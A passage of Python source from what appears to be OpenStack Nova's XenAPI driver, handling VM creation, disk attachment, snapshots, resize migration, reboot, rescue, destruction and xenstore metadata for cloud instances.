# NOTE(sirp): The create_disks() step will potentially take a
# *very* long time to complete since it has to fetch the image
# over the network and images can be several gigs in size. To
# avoid progress remaining at 0% for too long, make sure the
# first step is something that completes rather quickly.
bdev_set_default_root(undo_mgr)
disk_image_type = determine_disk_image_type_step(undo_mgr)
vdis = create_disks_step(undo_mgr, disk_image_type, image_meta)
kernel_file, ramdisk_file = create_kernel_ramdisk_step(undo_mgr)
vm_ref = create_vm_record_step(undo_mgr, vdis, disk_image_type,
kernel_file, ramdisk_file)
attach_disks_step(undo_mgr, vm_ref, vdis, disk_image_type)
setup_network_step(undo_mgr, vm_ref, vdis)
inject_metadata_step(undo_mgr, vm_ref)
inject_provider_data_step(undo_mgr, vm_ref)
prepare_security_group_filters_step(undo_mgr)
if rescue:
attach_root_disk_step(undo_mgr, vm_ref)
boot_instance_step(undo_mgr, vm_ref)
apply_security_group_filters_step(undo_mgr)
except Exception:
msg = _("Failed to spawn, rolling back")
undo_mgr.rollback_and_reraise(msg=msg, instance=instance)
def _create_vm(self, context, instance, name_label, vdis,
disk_image_type, network_info, kernel_file=None,
ramdisk_file=None, rescue=False):
"""Create VM instance."""
vm_ref = self._create_vm_record(context, instance, name_label,
vdis, disk_image_type, kernel_file, ramdisk_file)
self._attach_disks(instance, vm_ref, name_label, vdis,
disk_image_type)
self._setup_vm_networking(instance, vm_ref, vdis, network_info,
rescue)
# NOTE(mikal): file injection only happens if we are _not_ using a
# configdrive.
if not configdrive.required_by(instance):
self.inject_instance_metadata(instance, vm_ref)
self.inject_provider_data(instance, vm_ref, context)
return vm_ref
def _setup_vm_networking(self, instance, vm_ref, vdis, network_info,
rescue):
# Alter the image before VM start for network injection.
if CONF.flat_injected:
vm_utils.preconfigure_instance(self._session, instance,
vdis['root']['ref'], network_info)
self._create_vifs(vm_ref, instance, network_info)
self.inject_network_info(instance, network_info, vm_ref)
hostname = instance['hostname']
if rescue:
hostname = 'RESCUE-%s' % hostname
self.inject_hostname(instance, vm_ref, hostname)
def _create_vm_record(self, context, instance, name_label, vdis,
disk_image_type, kernel_file, ramdisk_file):
"""Create the VM record in Xen, making sure that we do not create
a duplicate name-label. Also do a rough sanity check on memory
to try to short-circuit a potential failure later. (The memory
check only accounts for running VMs, so it can miss other builds
that are in progress.)
"""
vm_ref = vm_utils.lookup(self._session, name_label)
if vm_ref is not None:
raise exception.InstanceExists(name=name_label)
# Ensure enough free memory is available
if not vm_utils.ensure_free_mem(self._session, instance):
raise exception.InsufficientFreeMemory(uuid=instance['uuid'])
mode = self._determine_vm_mode(instance, vdis, disk_image_type)
if instance['vm_mode'] != mode:
# Update database with normalized (or determined) value
self._virtapi.instance_update(context,
instance['uuid'], {'vm_mode': mode})
use_pv_kernel = (mode == vm_mode.XEN)
vm_ref = vm_utils.create_vm(self._session, instance, name_label,
kernel_file, ramdisk_file, use_pv_kernel)
return vm_ref
def _determine_vm_mode(self, instance, vdis, disk_image_type):
current_mode = vm_mode.get_from_instance(instance)
if current_mode == vm_mode.XEN or current_mode == vm_mode.HVM:
return current_mode
is_pv = False
if 'root' in vdis:
os_type = instance['os_type']
vdi_ref = vdis['root']['ref']
is_pv = vm_utils.determine_is_pv(self._session, vdi_ref,
disk_image_type, os_type)
if is_pv:
return vm_mode.XEN
else:
return vm_mode.HVM
def _attach_disks(self, instance, vm_ref, name_label, vdis,
disk_image_type, admin_password=None, files=None):
ctx = nova_context.get_admin_context()
instance_type = flavors.extract_instance_type(instance)
# Attach (required) root disk
if disk_image_type == vm_utils.ImageType.DISK_ISO:
# DISK_ISO needs two VBDs: the ISO disk and a blank RW disk
root_disk_size = instance_type['root_gb']
if root_disk_size > 0:
vm_utils.generate_iso_blank_root_disk(self._session, instance,
vm_ref, DEVICE_ROOT, name_label, root_disk_size)
cd_vdi = vdis.pop('iso')
vm_utils.attach_cd(self._session, vm_ref, cd_vdi['ref'],
DEVICE_CD)
else:
root_vdi = vdis['root']
if instance['auto_disk_config']:
LOG.debug(_("Auto configuring disk, attempting to "
"resize partition..."), instance=instance)
vm_utils.auto_configure_disk(self._session,
root_vdi['ref'],
instance_type['root_gb'])
vm_utils.create_vbd(self._session, vm_ref, root_vdi['ref'],
DEVICE_ROOT, bootable=True,
osvol=root_vdi.get('osvol'))
# Attach (optional) additional block-devices
for type_, vdi_info in vdis.items():
# Additional block-devices for boot use their device-name as the
# type.
if not type_.startswith('/dev'):
continue
# Convert device name to userdevice number, e.g. /dev/xvdb -> 1
userdevice = ord(block_device.strip_prefix(type_)) - ord('a')
vm_utils.create_vbd(self._session, vm_ref, vdi_info['ref'],
userdevice, bootable=False,
osvol=vdi_info.get('osvol'))
# Attach (optional) swap disk
swap_mb = instance_type['swap']
if swap_mb:
vm_utils.generate_swap(self._session, instance, vm_ref,
DEVICE_SWAP, name_label, swap_mb)
# Attach (optional) ephemeral disk
ephemeral_gb = instance_type['ephemeral_gb']
if ephemeral_gb:
vm_utils.generate_ephemeral(self._session, instance, vm_ref,
DEVICE_EPHEMERAL, name_label,
ephemeral_gb)
# Attach (optional) configdrive v2 disk
if configdrive.required_by(instance):
vm_utils.generate_configdrive(self._session, instance, vm_ref,
DEVICE_CONFIGDRIVE,
admin_password=admin_password,
files=files)
def _boot_new_instance(self, instance, vm_ref, injected_files,
admin_password, image_meta):
"""Boot a new instance and configure it."""
LOG.debug(_('Starting VM'), instance=instance)
self._start(instance, vm_ref)
ctx = nova_context.get_admin_context()
# Wait for boot to finish
LOG.debug(_('Waiting for instance state to become running'),
instance=instance)
expiration = time.time() + CONF.xenapi_running_timeout
while time.time() < expiration:
state = self.get_info(instance, vm_ref)['state']
if state == power_state.RUNNING:
break
greenthread.sleep(0.5)
if self.agent_enabled:
agent_build = self._virtapi.agent_build_get_by_triple(
ctx, 'xen', instance['os_type'], instance['architecture'])
if agent_build:
LOG.info(_('Latest agent build for %(hypervisor)s/%(os)s'
'/%(architecture)s is %(version)s') % agent_build)
else:
LOG.info(_('No agent build found for %(hypervisor)s/%(os)s'
'/%(architecture)s') % {
'hypervisor': 'xen',
'os': instance['os_type'],
'architecture': instance['architecture']})
# Update agent, if necessary
# This also waits until the agent starts
agent = self._get_agent(instance, vm_ref)
version = agent.get_agent_version()
if version:
LOG.info(_('Instance agent version: %s'), version,
instance=instance)
if (version and agent_build and
cmp_version(version, agent_build['version']) < 0):
agent.agent_update(agent_build)
# if the guest agent is not available, configure the
# instance, but skip the admin password configuration
no_agent = version is None
# Inject ssh key.
agent.inject_ssh_key()
# Inject files, if necessary
if injected_files:
# Inject any files, if specified
for path, contents in injected_files:
agent.inject_file(path, contents)
# Set admin password, if necessary
if admin_password and not no_agent:
agent.set_admin_password(admin_password)
# Reset network config
agent.resetnetwork()
# Set VCPU weight
instance_type = flavors.extract_instance_type(instance)
vcpu_weight = instance_type['vcpu_weight']
if vcpu_weight is not None:
LOG.debug(_("Setting VCPU weight"), instance=instance)
self._session.call_xenapi('VM.add_to_VCPUs_params', vm_ref,
'weight', str(vcpu_weight))
# Activate OS (if necessary)
profile = image_meta.get('properties', {}).\
get('rax_activation_profile')
if profile:
LOG.debug(_("RAX Activation Profile: %r"), profile,
instance=instance)
# get matching activation config for this profile:
config = self._rax_image_activation_config.get(profile)
if config:
agent.activate_instance(self._session, instance, vm_ref,
config)
def _get_vm_opaque_ref(self, instance, check_rescue=False):
"""Get xapi OpaqueRef from a db record.
:param check_rescue: if True will return the 'name'-rescue vm if it
exists, instead of just 'name'
"""
vm_ref = vm_utils.lookup(self._session, instance['name'], check_rescue)
if vm_ref is None:
raise exception.NotFound(_('Could not find VM with name %s') %
instance['name'])
return vm_ref
def _acquire_bootlock(self, vm):
"""Prevent an instance from booting."""
self._session.call_xenapi(
"VM.set_blocked_operations",
vm,
{"start": ""})
def _release_bootlock(self, vm):
"""Allow an instance to boot."""
self._session.call_xenapi(
"VM.remove_from_blocked_operations",
vm,
"start")
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance.
:param context: request context
:param instance: instance to be snapshotted
:param image_id: id of image to upload to
Steps involved in a XenServer snapshot:
1. XAPI-Snapshot: Snapshotting the instance using XenAPI. This
creates: Snapshot (Template) VM, Snapshot VBD, Snapshot VDI,
Snapshot VHD
2. Wait-for-coalesce: The Snapshot VDI and Instance VDI both point to
a 'base-copy' VDI. The base_copy is immutable and may be chained
with other base_copies. If chained, the base_copies
coalesce together, so, we must wait for this coalescing to occur to
get a stable representation of the data on disk.
3. Push-to-data-store: Once coalesced, we call a plugin on the
XenServer that will bundle the VHDs together and then push the
bundle. Depending on the configured value of
'xenapi_image_upload_handler', image data may be pushed to
Glance or the specified data store.
"""
vm_ref = self._get_vm_opaque_ref(instance)
label = "%s-snapshot" % instance['name']
max_size = CONF.max_snapshot_size
with vm_utils.snapshot_attached_here(
self._session, instance, vm_ref, label,
update_task_state) as vdi_uuids:
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
try:
self.image_upload_handler.upload_image(context,
self._session,
instance,
vdi_uuids,
image_id,
max_size)
except self._session.XenAPI.Failure as exc:
_type, _method, error = exc.details[:3]
if error == 'VHDsTooLargeError':
LOG.warn(_("Refusing to create snapshot. Instance size is"
" greater than maximum allowed snapshot size"),
instance=instance)
image_service = glance.get_default_image_service()
image_service.update(context, image_id,
{'status': 'error'})
update_task_state(task_state=None,
expected_state=task_states.IMAGE_UPLOADING)
return
else:
raise
LOG.debug(_("Finished snapshot and upload for VM"),
instance=instance)
def _migrate_vhd(self, instance, vdi_uuid, dest, sr_path, seq_num):
LOG.debug(_("Migrating VHD '%(vdi_uuid)s' with seq_num %(seq_num)d"),
locals(), instance=instance)
instance_uuid = instance['uuid']
try:
self._session.call_plugin_serialized('migration', 'transfer_vhd',
instance_uuid=instance_uuid, host=dest, vdi_uuid=vdi_uuid,
sr_path=sr_path, seq_num=seq_num)
except self._session.XenAPI.Failure:
msg = _("Failed to transfer vhd to new host")
raise exception.MigrationError(reason=msg)
def _get_orig_vm_name_label(self, instance):
return instance['name'] + '-orig'
def _update_instance_progress(self, context, instance, step, total_steps):
"""Update instance progress percent to reflect current step number
"""
# FIXME(sirp): for now we're taking a KISS approach to instance
# progress:
# Divide the action's workflow into discrete steps and "bump" the
# instance's progress field as each step is completed.
#
# For a first cut this should be fine, however, for large VM images,
# the _create_disks step begins to dominate the equation. A
# better approximation would use the percentage of the VM image that
# has been streamed to the destination host.
progress = round(float(step) / total_steps * 100)
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
self._virtapi.instance_update(context, instance['uuid'],
{'progress': progress})
def _resize_ensure_vm_is_shutdown(self, instance, vm_ref):
if vm_utils.is_vm_shutdown(self._session, vm_ref):
LOG.debug(_("VM was already shutdown."), instance=instance)
return
if not vm_utils.clean_shutdown_vm(self._session, instance, vm_ref):
LOG.debug(_("Clean shutdown did not complete successfully, "
"trying hard shutdown."), instance=instance)
if not vm_utils.hard_shutdown_vm(self._session, instance, vm_ref):
raise exception.ResizeError(
reason=_("Unable to terminate instance."))
def _migrate_disk_resizing_down(self, context, instance, dest,
instance_type, vm_ref, sr_path):
if not instance['auto_disk_config']:
reason = _('Resize down not allowed without auto_disk_config')
raise exception.ResizeError(reason=reason)
step = make_step_decorator(context, instance,
self._virtapi.instance_update)
@step
def fake_step_to_match_resizing_up():
pass
@step
def rename_and_power_off_vm(undo_mgr):
self._resize_ensure_vm_is_shutdown(instance, vm_ref)
self._apply_orig_vm_name_label(instance, vm_ref)
def restore_orig_vm():
# Do not need to restore block devices, not yet been removed
self._restore_orig_vm_and_cleanup_orphan(instance, None)
undo_mgr.undo_with(restore_orig_vm)
@step
def create_copy_vdi_and_resize(undo_mgr, old_vdi_ref):
new_vdi_ref, new_vdi_uuid = vm_utils.resize_disk(self._session,
instance, old_vdi_ref, instance_type)
def cleanup_vdi_copy():
vm_utils.destroy_vdi(self._session, new_vdi_ref)
undo_mgr.undo_with(cleanup_vdi_copy)
return new_vdi_ref, new_vdi_uuid
@step
def transfer_vhd_to_dest(new_vdi_ref, new_vdi_uuid):
self._migrate_vhd(instance, new_vdi_uuid, dest, sr_path, 0)
# Clean up VDI now that it's been copied
vm_utils.destroy_vdi(self._session, new_vdi_ref)
@step
def fake_step_to_be_executed_by_finish_migration():
pass
undo_mgr = utils.UndoManager()
try:
fake_step_to_match_resizing_up()
rename_and_power_off_vm(undo_mgr)
old_vdi_ref, _ignore = vm_utils.get_vdi_for_vm_safely(
self._session, vm_ref)
new_vdi_ref, new_vdi_uuid = create_copy_vdi_and_resize(
undo_mgr, old_vdi_ref)
transfer_vhd_to_dest(new_vdi_ref, new_vdi_uuid)
except Exception, error:
msg = _("_migrate_disk_resizing_down failed. "
"Restoring orig vm due_to: %{exception}.")
LOG.exception(msg, instance=instance)
undo_mgr._rollback()
raise exception.InstanceFaultRollback(error)
def _migrate_disk_resizing_up(self, context, instance, dest, vm_ref,
sr_path):
self._apply_orig_vm_name_label(instance, vm_ref)
# 1. Create Snapshot
label = "%s-snapshot" % instance['name']
with vm_utils.snapshot_attached_here(
self._session, instance, vm_ref, label) as vdi_uuids:
self._update_instance_progress(context, instance,
step=1,
total_steps=RESIZE_TOTAL_STEPS)
# 2. Transfer the immutable VHDs (base-copies)
#
# The first VHD will be the leaf (aka COW) that is being used by
# the VM. For this step, we're only interested in the immutable
# VHDs which are all of the parents of the leaf VHD.
for seq_num, vdi_uuid in itertools.islice(
enumerate(vdi_uuids), 1, None):
self._migrate_vhd(instance, vdi_uuid, dest, sr_path, seq_num)
self._update_instance_progress(context, instance,
step=2,
total_steps=RESIZE_TOTAL_STEPS)
# 3. Now power down the instance
self._resize_ensure_vm_is_shutdown(instance, vm_ref)
self._update_instance_progress(context, instance,
step=3,
total_steps=RESIZE_TOTAL_STEPS)
# 4. Transfer the COW VHD
vdi_ref, vm_vdi_rec = vm_utils.get_vdi_for_vm_safely(
self._session, vm_ref)
cow_uuid = vm_vdi_rec['uuid']
self._migrate_vhd(instance, cow_uuid, dest, sr_path, 0)
self._update_instance_progress(context, instance,
step=4,
total_steps=RESIZE_TOTAL_STEPS)
def _apply_orig_vm_name_label(self, instance, vm_ref):
# NOTE(sirp): in case we're resizing to the same host (for dev
# purposes), apply a suffix to name-label so the two VM records
# extant until a confirm_resize don't collide.
name_label = self._get_orig_vm_name_label(instance)
vm_utils.set_vm_name_label(self._session, vm_ref, name_label)
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, block_device_info):
"""Copies a VHD from one host machine to another, possibly
resizing filesystem before hand.
:param instance: the instance that owns the VHD in question.
:param dest: the destination host machine.
:param instance_type: instance_type to resize to
"""
# 0. Zero out the progress to begin
self._update_instance_progress(context, instance,
step=0,
total_steps=RESIZE_TOTAL_STEPS)
vm_ref = self._get_vm_opaque_ref(instance)
sr_path = vm_utils.get_sr_path(self._session)
old_gb = instance['root_gb']
new_gb = instance_type['root_gb']
resize_down = old_gb > new_gb
if resize_down:
self._migrate_disk_resizing_down(
context, instance, dest, instance_type, vm_ref, sr_path)
else:
self._migrate_disk_resizing_up(
context, instance, dest, vm_ref, sr_path)
self._detach_block_devices_from_orig_vm(instance, block_device_info)
# NOTE(sirp): disk_info isn't used by the xenapi driver, instead it
# uses a staging-area (/images/instance<uuid>) and sequence-numbered
# VHDs to figure out how to reconstruct the VDI chain after syncing
disk_info = {}
return disk_info
def _detach_block_devices_from_orig_vm(self, instance, block_device_info):
block_device_mapping = virt_driver.block_device_info_get_mapping(
block_device_info)
name_label = self._get_orig_vm_name_label(instance)
for vol in block_device_mapping:
connection_info = vol['connection_info']
mount_device = vol['mount_device'].rpartition("/")[2]
self._volumeops.detach_volume(connection_info, name_label,
mount_device)
def _resize_instance(self, instance, root_vdi):
"""Resize an instances root disk."""
new_disk_size = instance['root_gb'] * 1024 * 1024 * 1024
if not new_disk_size:
return
# Get current size of VDI
virtual_size = self._session.call_xenapi('VDI.get_virtual_size',
root_vdi['ref'])
virtual_size = int(virtual_size)
old_gb = virtual_size / (1024 * 1024 * 1024)
new_gb = instance['root_gb']
if virtual_size < new_disk_size:
# Resize up. Simple VDI resize will do the trick
vdi_uuid = root_vdi['uuid']
LOG.debug(_("Resizing up VDI %(vdi_uuid)s from %(old_gb)dGB to "
"%(new_gb)dGB"), locals(), instance=instance)
resize_func_name = self.check_resize_func_name()
self._session.call_xenapi(resize_func_name, root_vdi['ref'],
str(new_disk_size))
LOG.debug(_("Resize complete"), instance=instance)
def check_resize_func_name(self):
"""Check the function name used to resize an instance based
on product_brand and product_version."""
brand = self._session.product_brand
version = self._session.product_version
# To maintain backwards compatibility. All recent versions
# should use VDI.resize
if bool(version) and bool(brand):
xcp = brand == 'XCP'
r1_2_or_above = (
(
version[0] == 1
and version[1] > 1
)
or version[0] > 1)
xenserver = brand == 'XenServer'
r6_or_above = version[0] > 5
if (xcp and not r1_2_or_above) or (xenserver and not r6_or_above):
return 'VDI.resize_online'
return 'VDI.resize'
def reboot(self, instance, reboot_type, bad_volumes_callback=None):
"""Reboot VM instance."""
# Note (salvatore-orlando): security group rules are not re-enforced
# upon reboot, since this action on the XenAPI drivers does not
# remove existing filters
vm_ref = self._get_vm_opaque_ref(instance, check_rescue=True)
try:
if reboot_type == "HARD":
self._session.call_xenapi('VM.hard_reboot', vm_ref)
else:
self._session.call_xenapi('VM.clean_reboot', vm_ref)
except self._session.XenAPI.Failure as exc:
details = exc.details
if (details[0] == 'VM_BAD_POWER_STATE' and
details[-1] == 'halted'):
LOG.info(_("Starting halted instance found during reboot"),
instance=instance)
self._start(instance, vm_ref=vm_ref,
bad_volumes_callback=bad_volumes_callback)
return
elif details[0] == 'SR_BACKEND_FAILURE_46':
LOG.warn(_("Reboot failed due to bad volumes, detaching bad"
" volumes and starting halted instance"),
instance=instance)
self._start(instance, vm_ref=vm_ref,
bad_volumes_callback=bad_volumes_callback)
return
else:
raise
def set_admin_password(self, instance, new_pass):
"""Set the root/admin password on the VM instance."""
if self.agent_enabled:
vm_ref = self._get_vm_opaque_ref(instance)
agent = self._get_agent(instance, vm_ref)
agent.set_admin_password(new_pass)
else:
raise NotImplementedError()
def inject_file(self, instance, path, contents):
"""Write a file to the VM instance."""
if self.agent_enabled:
vm_ref = self._get_vm_opaque_ref(instance)
agent = self._get_agent(instance, vm_ref)
agent.inject_file(path, contents)
else:
raise NotImplementedError()
@staticmethod
def _sanitize_xenstore_key(key):
"""
Xenstore only allows the following characters as keys:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
0123456789-/_@
So convert the others to _
Also convert / to _, because that is somewhat like a path
separator.
"""
allowed_chars = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789-_@")
return ''.join([x in allowed_chars and x or '_' for x in key])
def inject_instance_metadata(self, instance, vm_ref):
"""Inject instance metadata into xenstore."""
def store_meta(topdir, data_list):
for item in data_list:
key = self._sanitize_xenstore_key(item['key'])
value = item['value'] or ''
self._add_to_param_xenstore(vm_ref, '%s/%s' % (topdir, key),
jsonutils.dumps(value))
# Store user metadata
store_meta('vm-data/user-metadata', instance['metadata'])
def change_instance_metadata(self, instance, diff):
"""Apply changes to instance metadata to xenstore."""
vm_ref = self._get_vm_opaque_ref(instance)
for key, change in diff.items():
key = self._sanitize_xenstore_key(key)
location = 'vm-data/user-metadata/%s' % key
if change[0] == '-':
self._remove_from_param_xenstore(vm_ref, location)
try:
self._delete_from_xenstore(instance, location,
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
elif change[0] == '+':
self._add_to_param_xenstore(vm_ref, location,
jsonutils.dumps(change[1]))
try:
self._write_to_xenstore(instance, location, change[1],
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
def _find_root_vdi_ref(self, vm_ref):
"""Find and return the root vdi ref for a VM."""
if not vm_ref:
return None
vbd_refs = self._session.call_xenapi("VM.get_VBDs", vm_ref)
for vbd_uuid in vbd_refs:
vbd = self._session.call_xenapi("VBD.get_record", vbd_uuid)
if vbd["userdevice"] == DEVICE_ROOT:
return vbd["VDI"]
raise exception.NotFound(_("Unable to find root VBD/VDI for VM"))
def _destroy_vdis(self, instance, vm_ref):
"""Destroys all VDIs associated with a VM."""
LOG.debug(_("Destroying VDIs"), instance=instance)
vdi_refs = vm_utils.lookup_vm_vdis(self._session, vm_ref)
if not vdi_refs:
return
for vdi_ref in vdi_refs:
try:
vm_utils.destroy_vdi(self._session, vdi_ref)
except volume_utils.StorageError as exc:
LOG.error(exc)
def _destroy_kernel_ramdisk(self, instance, vm_ref):
"""Three situations can occur:
1. We have neither a ramdisk nor a kernel, in which case we are a
RAW image and can omit this step
2. We have one or the other, in which case, we should flag as an
error
3. We have both, in which case we safely remove both the kernel
and the ramdisk.
"""
instance_uuid = instance['uuid']
if not instance['kernel_id'] and not instance['ramdisk_id']:
# 1. No kernel or ramdisk
LOG.debug(_("Using RAW or VHD, skipping kernel and ramdisk "
"deletion"), instance=instance)
return
if not (instance['kernel_id'] and instance['ramdisk_id']):
# 2. We only have kernel xor ramdisk
raise exception.InstanceUnacceptable(instance_id=instance_uuid,
reason=_("instance has a kernel or ramdisk but not both"))
# 3. We have both kernel and ramdisk
(kernel, ramdisk) = vm_utils.lookup_kernel_ramdisk(self._session,
vm_ref)
if kernel or ramdisk:
vm_utils.destroy_kernel_ramdisk(self._session, kernel, ramdisk)
LOG.debug(_("kernel/ramdisk files removed"), instance=instance)
def _destroy_rescue_instance(self, rescue_vm_ref, original_vm_ref):
"""Destroy a rescue instance."""
# Shutdown Rescue VM
vm_rec = self._session.call_xenapi("VM.get_record", rescue_vm_ref)
state = vm_utils.compile_info(vm_rec)['state']
if state != power_state.SHUTDOWN:
self._session.call_xenapi("VM.hard_shutdown", rescue_vm_ref)
# Destroy Rescue VDIs
vdi_refs = vm_utils.lookup_vm_vdis(self._session, rescue_vm_ref)
root_vdi_ref = self._find_root_vdi_ref(original_vm_ref)
vdi_refs = [vdi_ref for vdi_ref in vdi_refs if vdi_ref != root_vdi_ref]
vm_utils.safe_destroy_vdis(self._session, vdi_refs)
# Destroy Rescue VM
self._session.call_xenapi("VM.destroy", rescue_vm_ref)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
"""Destroy VM instance.
This is the method exposed by xenapi_conn.destroy(). The rest of the
destroy_* methods are internal.
"""
LOG.info(_("Destroying VM"), instance=instance)
# We don't use _get_vm_opaque_ref because the instance may
# truly not exist because of a failure during build. A valid
# vm_ref is checked correctly where necessary.
vm_ref = vm_utils.lookup(self._session, instance['name'])
rescue_vm_ref = vm_utils.lookup(self._session,
"%s-rescue" % instance['name'])
if rescue_vm_ref:
self._destroy_rescue_instance(rescue_vm_ref, vm_ref)
# NOTE(sirp): `block_device_info` is not used, information about which
# volumes should be detached is determined by the
# VBD.other_config['osvol'] attribute
return self._destroy(instance, vm_ref, network_info=network_info,
destroy_disks=destroy_disks)
def _destroy(self, instance, vm_ref, network_info=None,
destroy_disks=True):
"""Destroys VM instance by performing:
1. A shutdown
2. Destroying associated VDIs.
3. Destroying kernel and ramdisk files (if necessary).
4. Destroying that actual VM record.
"""
if vm_ref is None:
LOG.warning(_("VM is not present, skipping destroy..."),
instance=instance)
return
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
if destroy_disks:
self._volumeops.detach_all(vm_ref)
self._destroy_vdis(instance, vm_ref)
self._destroy_kernel_ramdisk(instance, vm_ref)
vm_utils.destroy_vm(self._session, instance, vm_ref)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(
instance, network_info=network_info)
def pause(self, instance):
"""Pause VM instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._session.call_xenapi('VM.pause', vm_ref)
def unpause(self, instance):
"""Unpause VM instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._session.call_xenapi('VM.unpause', vm_ref)
def suspend(self, instance):
"""Suspend the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._acquire_bootlock(vm_ref)
self._session.call_xenapi('VM.suspend', vm_ref)
def resume(self, instance):
"""Resume the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._release_bootlock(vm_ref)
self._session.call_xenapi('VM.resume', vm_ref, False, True)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Rescue the specified instance.
- shutdown the instance VM.
- set 'bootlock' to prevent the instance from starting in rescue.
- spawn a rescue VM (the vm name-label will be instance-N-rescue).
"""
rescue_name_label = '%s-rescue' % instance['name']
rescue_vm_ref = vm_utils.lookup(self._session, rescue_name_label)
if rescue_vm_ref:
raise RuntimeError(_("Instance is already in Rescue Mode: %s")
% instance['name'])
vm_ref = self._get_vm_opaque_ref(instance)
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
self._acquire_bootlock(vm_ref)
self.spawn(context, instance, image_meta, [], rescue_password,
network_info, name_label=rescue_name_label, rescue=True)
def unrescue(self, instance):
"""Unrescue the specified instance.
- unplug the instance VM's disk from the rescue VM.
- teardown the rescue VM.
- release the bootlock to allow the instance VM to start.
"""
rescue_vm_ref = vm_utils.lookup(self._session,
"%s-rescue" % instance['name'])
if not rescue_vm_ref:
raise exception.InstanceNotInRescueMode(
instance_id=instance['uuid'])
original_vm_ref = self._get_vm_opaque_ref(instance)
self._destroy_rescue_instance(rescue_vm_ref, original_vm_ref)
self._release_bootlock(original_vm_ref)
self._start(instance, original_vm_ref)
def soft_delete(self, instance):
"""Soft delete the specified instance."""
try:
vm_ref = self._get_vm_opaque_ref(instance)
except exception.NotFound:
LOG.warning(_("VM is not present, skipping soft delete..."),
instance=instance)
else:
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
self._acquire_bootlock(vm_ref)
def restore(self, instance):
"""Restore the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._release_bootlock(vm_ref)
self._start(instance, vm_ref)
def power_off(self, instance):
"""Power off the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
def power_on(self, instance):
"""Power on the specified instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._start(instance, vm_ref)
def _cancel_stale_tasks(self, timeout, task):
"""Cancel the given tasks that are older than the given timeout."""
task_refs = self._session.call_xenapi("task.get_by_name_label", task)
for task_ref in task_refs:
task_rec = self._session.call_xenapi("task.get_record", task_ref)
task_created = timeutils.parse_strtime(task_rec["created"].value,
"%Y%m%dT%H:%M:%SZ")
if timeutils.is_older_than(task_created, timeout):
self._session.call_xenapi("task.cancel", task_ref)
def poll_rebooting_instances(self, timeout, instances):
"""Look for expirable rebooting instances.
- issue a "hard" reboot to any instance that has been stuck in a
reboot state for >= the given timeout
"""
# NOTE(jk0): All existing clean_reboot tasks must be cancelled before
# we can kick off the hard_reboot tasks.
self._cancel_stale_tasks(timeout, 'VM.clean_reboot')
ctxt = nova_context.get_admin_context()
instances_info = dict(instance_count=len(instances),
timeout=timeout)
if instances_info["instance_count"] > 0:
LOG.info(_("Found %(instance_count)d hung reboots "
"older than %(timeout)d seconds") % instances_info)
for instance in instances:
LOG.info(_("Automatically hard rebooting"), instance=instance)
self.compute_api.reboot(ctxt, instance, "HARD")
def get_info(self, instance, vm_ref=None):
"""Return data about VM instance."""
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
return vm_utils.compile_info(vm_rec)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
vm_ref = self._get_vm_opaque_ref(instance)
vm_rec = self._session.call_xenapi("VM.get_record", vm_ref)
return vm_utils.compile_diagnostics(vm_rec)
def _get_vifs_for_instance(self, vm_rec):
return [self._session.call_xenapi("VIF.get_record", vrec)
for vrec in vm_rec['VIFs']]
def _get_vif_device_map(self, vm_rec):
vif_map = {}
for vif in self._get_vifs_for_instance(vm_rec):
vif_map[vif['device']] = vif['MAC']
return vif_map
def get_all_bw_counters(self):
"""Return running bandwidth counter for each interface on each
running VM"""
counters = vm_utils.fetch_bandwidth(self._session)
bw = {}
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
vif_map = self._get_vif_device_map(vm_rec)
name = vm_rec['name_label']
if 'nova_uuid' not in vm_rec['other_config']:
continue
dom = vm_rec.get('domid')
if dom is None or dom not in counters:
continue
vifs_bw = bw.setdefault(name, {})
for vif_num, vif_data in counters[dom].iteritems():
mac = vif_map[vif_num]
vif_data['mac_address'] = mac
vifs_bw[mac] = vif_data
return bw
def get_console_output(self, instance):
"""Return snapshot of console."""
# TODO(armando-migliaccio): implement this to fix pylint!
return 'FAKE CONSOLE OUTPUT of instance'
def get_vnc_console(self, instance):
"""Return connection info for a vnc console."""
if instance['vm_state'] == vm_states.RESCUED:
name = '%s-rescue' % instance['name']
vm_ref = vm_utils.lookup(self._session, name)
if vm_ref is None:
# The rescue instance might not be ready at this point.
raise exception.InstanceNotReady(instance_id=instance['uuid'])
else:
vm_ref = vm_utils.lookup(self._session, instance['name'])
if vm_ref is None:
# The compute manager expects InstanceNotFound for this case.
raise exception.InstanceNotFound(instance_id=instance['uuid'])
session_id = self._session.get_session_id()
path = "/console?ref=%s&session_id=%s" % (str(vm_ref), session_id)
# NOTE: XS5.6sp2+ use http over port 80 for xenapi com
return {'host': CONF.vncserver_proxyclient_address, 'port': 80,
'internal_access_path': path}
def _vif_xenstore_data(self, vif):
"""convert a network info vif to injectable instance data."""
def get_ip(ip):
if not ip:
return None
return ip['address']
def fixed_ip_dict(ip, subnet):
if ip['version'] == 4:
netmask = str(subnet.as_netaddr().netmask)
else:
netmask = subnet.as_netaddr()._prefixlen
